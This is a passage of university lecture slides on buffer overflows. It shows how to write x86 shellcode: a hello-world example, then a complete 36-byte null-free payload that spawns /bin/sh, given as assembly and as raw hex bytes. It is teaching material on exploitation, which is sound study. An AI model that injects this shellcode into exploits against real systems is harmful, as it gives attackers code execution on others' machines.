Software Security, Buffer Overflow: The Essentials (slide 20 / 83)
Shellcode, Basic Example: How to write shellcode?

hello.asm (writes "Hello, world!" to stdout):

section .data              ; section declaration
msg db "Hello, world!"     ; the string

section .text              ; section declaration
global _start              ; default entry point for ELF linking

_start:
; write() call
mov eax, 4        ; put 4 into eax, since write is syscall #4
mov ebx, 1        ; put stdout into ebx, since the proper fd is 1
mov ecx, msg      ; put the address of the string into ecx
mov edx, 13       ; put 13 into edx, since the string is 13 bytes long
int 0x80          ; call the kernel to make the system call happen

; exit() call
mov eax, 1        ; put 1 into eax, since exit is syscall #1
mov ebx, 0        ; put 0 into ebx (the exit status)
int 0x80          ; call the kernel to make the system call happen

; build commands are not on the slide; on a 32-bit-capable host one way is:
;   nasm -f elf hello.asm && ld -m elf_i386 -o a.out hello.o
Course outline (Software Security, Buffer Overflow: The Essentials; Dept. of Computer Science, Nanjing University):
- Vulnerability Metrics
- What are Buffer Overflows?
- Basic Example
- Shellcode: Definition; Basic Example; Shell-Spawning Shellcode
- A Real World Buffer Overflow Attack: Key Point; A vulnerability in Easy RM to MP3 Conversion; How to hack the vulnerable program
- Integer Overflow: Overview; A Real World Example; Common Patterns in Integer Overflow
- Heap Overflow: What is the Heap?; An Abstract Example
Software Security, Buffer Overflow: The Essentials (slide 21 / 83)
Shellcode, Basic Example: How to write shellcode?

objdump -d a.out (disassembly of the assembled and linked hello.asm):

zhujun@zhujun-desktop:~/Desktop/BufferOverflow$ objdump -d a.out

a.out:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:  b8 04 00 00 00    mov    $0x4,%eax
 8048085:  bb 01 00 00 00    mov    $0x1,%ebx
 804808a:  b9 a4 90 04 08    mov    $0x80490a4,%ecx
 804808f:  ba 0d 00 00 00    mov    $0xd,%edx
 8048094:  cd 80             int    $0x80
 8048096:  b8 01 00 00 00    mov    $0x1,%eax
 804809b:  bb 00 00 00 00    mov    $0x0,%ebx
 80480a0:  cd 80             int    $0x80
Software Security, Buffer Overflow: The Essentials (slide 22 / 83)
Shellcode: Shell-Spawning Shellcode

exec_shell.c (spawns /bin/sh with execve):

#include <unistd.h>

int main() {
    char filename[] = "/bin/sh\x00";
    char *argv[2], *envp[1]; // arrays that contain char pointers

    argv[0] = filename;      // only argument is filename
    argv[1] = 0;             // null terminate the argument array

    envp[0] = 0;             // null terminate the environment array

    execve(filename, argv, envp);
    return 0;                // only reached if execve fails
}

zlin@hacking-tao:~/booksrc $ gcc exec_shell.c
zlin@hacking-tao:~/booksrc $ wc -c ./a.out
6662 ./a.out
zlin@hacking-tao:~/booksrc $ ./a.out
sh-3.2$ exit
Software Security, Buffer Overflow: The Essentials (slide 23 / 83)
Shellcode: Shell-Spawning Shellcode

exec_shell.s (the same execve("/bin/sh") call written as position-independent shellcode):

BITS 32

  jmp short two        ; jump down to the bottom for the call trick
one:
; int execve(const char *filename, char *const argv[], char *const envp[])
  pop ebx              ; ebx has the addr of the string
  xor eax, eax         ; put 0 into eax
  mov [ebx+7], al      ; null terminate the /bin/sh string
  mov [ebx+8], ebx     ; put addr from ebx where the AAAA is
  mov [ebx+12], eax    ; put 32-bit null terminator where the BBBB is
  lea ecx, [ebx+8]     ; load the address of [ebx+8] into ecx for argv ptr
  lea edx, [ebx+12]    ; edx = ebx + 12, which is the envp ptr
  mov al, 11           ; syscall #11
  int 0x80             ; do it

two:
  call one             ; use a call to get string address
  db '/bin/sh'         ; the XAAAABBBB bytes aren't needed
Software Security, Buffer Overflow: The Essentials (slide 24 / 83)
Shellcode: Shell-Spawning Shellcode

Assembling exec_shell.s to raw bytes and inspecting them (36 bytes, no null bytes):

zlin@hacking-tao:~/booksrc $ nasm exec_shell.s
zlin@hacking-tao:~/booksrc $ hexdump -C exec_shell
00000000  eb 16 5b 31 c0 88 43 07  89 5b 08 89 43 0c 8d 4b  |..[1..C..[..C..K|
00000010  08 8d 53 0c b0 0b cd 80  e8 e5 ff ff ff 2f 62 69  |..S........../bi|
00000020  6e 2f 73 68                                       |n/sh|
00000024
zlin@hacking-tao:~/booksrc $ wc -c exec_shell
36 exec_shell